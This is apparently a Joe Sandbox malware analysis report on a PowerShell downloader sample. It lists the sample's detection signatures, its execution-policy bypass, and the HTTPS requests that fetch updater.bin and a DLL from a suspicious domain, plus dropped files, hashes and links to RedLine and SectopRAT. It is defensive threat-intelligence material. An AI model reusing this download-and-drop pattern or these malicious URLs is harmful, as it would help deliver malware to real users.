Windows Analysis Report
SFHgtxFGtB.ps1

Overview

General Information

Sample name:SFHgtxFGtB.ps1
Analysis ID:1576522
MD5:6a34a3dbed524eed6d73c72188418d80
SHA1:6a6ee1aa6ad9d9fbd7b7112df3a5c92b83c18667
SHA256:45ab4ca2483759d89bc446e6797e86489eb08cfeb3f740440a83ff6d83eb5503
Tags:docu-signer-comps1user-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Powershell drops PE file
Contains long sleeps (>= 3 min)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 4548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", ProcessId: 4548, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", ProcessId: 4548, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T08:24:41.038991+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49700 | 104.21.87.65 | 443 | TCP

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.7% probability
Source: unknown HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1417254390.00000225043F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1446816455.000002251E81A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E81A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1447996479.000002251E8BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000000.00000002.1446215175.000002251E593000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbppDagb source: powershell.exe, 00000000.00000002.1447996479.000002251E8DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbECd source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446215175.000002251E593000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbsk\D source: powershell.exe, 00000000.00000002.1447996479.000002251E8DA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 104.21.87.65:443
Source: global traffic HTTP traffic detected:
  GET /api/uz/0912545164/updater.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: docu-signer.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /api/uz/0912545164/log4cxx.dll HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: docu-signer.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: docu-signer.com
Source: powershell.exe, 00000000.00000002.1417937766.00000225073C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022507151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docu-signer.com
Source: powershell.exe, 00000000.00000002.1440811136.00000225167EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1417937766.00000225064F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: updater.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000000.00000002.1417937766.00000225064F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022507392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.000002250707E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dll
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.000002250707E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1417937766.00000225077FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1440811136.00000225167EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\52821801\updater.exe
Source: updater.exe.0.dr Static PE information: Data appended to the last section found
Source: classification engine Classification label: mal48.winPS1@3/7@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywhbt5jh.f3f.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, urlmon.dll, iertutil.dll, netutils.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: updater.exe.0.dr Static PE information: real checksum: 0xdf890 should be: 0xd6a64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFAAC466FAB push ebx; iretd 0_2_00007FFAAC466FCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFAAC466FCB push ebx; iretd 0_2_00007FFAAC466FCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6485
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\52821801\updater.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: powershell.exe, 00000000.00000002.1446816455.000002251E82E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMicrYY3
Source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: updater.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 PowerShell | 1 DLL Side-Loading | 2 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Process Injection | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
SFHgtxFGtB.ps1 | 5% | ReversingLabs | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
docu-signer.com | 104.21.87.65 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://docu-signer.com/api/uz/0912545164/updater.bin | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/log4cxx.dll | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.87.65 | docu-signer.com | United States | 13335 | CLOUDFLARENETUS | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576522
Start date and time: 2024-12-17 08:23:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SFHgtxFGtB.ps1
Detection: MAL
Classification: mal48.winPS1@3/7@1/1
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 1
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 4548 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: SFHgtxFGtB.ps1

Time | Type | Description
02:24:32 | API Interceptor | 43x Sleep call for process: powershell.exe modified

Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.87.65 | fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
docu-signer.com | fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 104.21.87.65

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | DG55Gu1yGM.exe | malicious | LummaC | 104.21.56.70
 | he55PbvM2G.exe | malicious | LummaC | 104.21.56.70
 | fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 104.21.87.65
 | 1iC0WTxgUf.exe | malicious | Unknown | 104.18.0.75
 | Instruction_695-18112-002_Rev.PDF.lnk.d.lnk | malicious | Unknown | 104.21.83.229
 | https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637 | malicious | Unknown | 104.17.25.14
 | seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
 | sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta | malicious | Cobalt Strike, Remcos | 172.67.187.200
 | createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook | 104.21.84.67
 | ppc.elf | malicious | Mirai, Moobot | 172.65.156.157

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Nueva orden de compra-836528268278278.xlsx.exe | malicious | Unknown | 104.21.87.65
 | fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 104.21.87.65
 | seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 104.21.87.65
 | sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta | malicious | Cobalt Strike, Remcos | 104.21.87.65
 | createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook | 104.21.87.65
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.87.65
 | drivers.exe | malicious | Unknown | 104.21.87.65
 | GameBoxMini.exe | malicious | Unknown | 104.21.87.65
 | drivers.exe | malicious | Unknown | 104.21.87.65
 | Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.87.65

No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1628158735648508
Encrypted: false
SSDEEP: 3:Nllluldhz/lL:NllU
MD5: 03744CE5681CB7F5E53A02F19FA22067
SHA1: 234FB09010F6714453C83795D8CF3250D871D4DF
SHA-256: 88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
SHA-512: 0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................L..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2011444
Entropy (8bit): 6.104381684032337
Encrypted: false
SSDEEP: 49152:DpD+okC1j/B5ZMQJrhES5Jr4l5/WSpCe/:gOZMt
MD5: BCC04F3C8F29B9533C8AFF0681D4EB4F
SHA1: 2EDB98E832959106BC3E6110DFB0A20A549BDCB1
SHA-256: D0E19B9FED36046A80CA84C68624EEED3FAC491962FC121D1D7B6433006990DC
SHA-512: DCD54AE36962E5072BE4B31E20BC7D42A4FF9D90E95930F09A0CBDB6E0F7495A38409DEFCACF072C8C452188DBBF4863F5F8E21A24F50D36FFDAE61959176CF1
Malicious: false
Reputation: low
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):853168
                              Entropy (8bit):6.541453707916163
                              Encrypted:false
                              SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawVQ:6T3E53Myyzl0hMf1tr7CawK
                              MD5:9EB440B3924AC66A47AE14D9FA83352D
                              SHA1:26D266289F1292E191F90E887F584E23D4AEB698
                              SHA-256:54E470D1BE7C796D92A7408EA07614268D82C8E75BD21B60992633075762FBAF
                              SHA-512:3B7EDA5C8614C4FC7D582B9F114ECF5624133945F060D3042F337AA64F202EF4A4E0CF6C7CE88E98C617363007D9EE04CB27DAF03BDFD5A82C815CA9F41F5CB9
                              Malicious:true
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
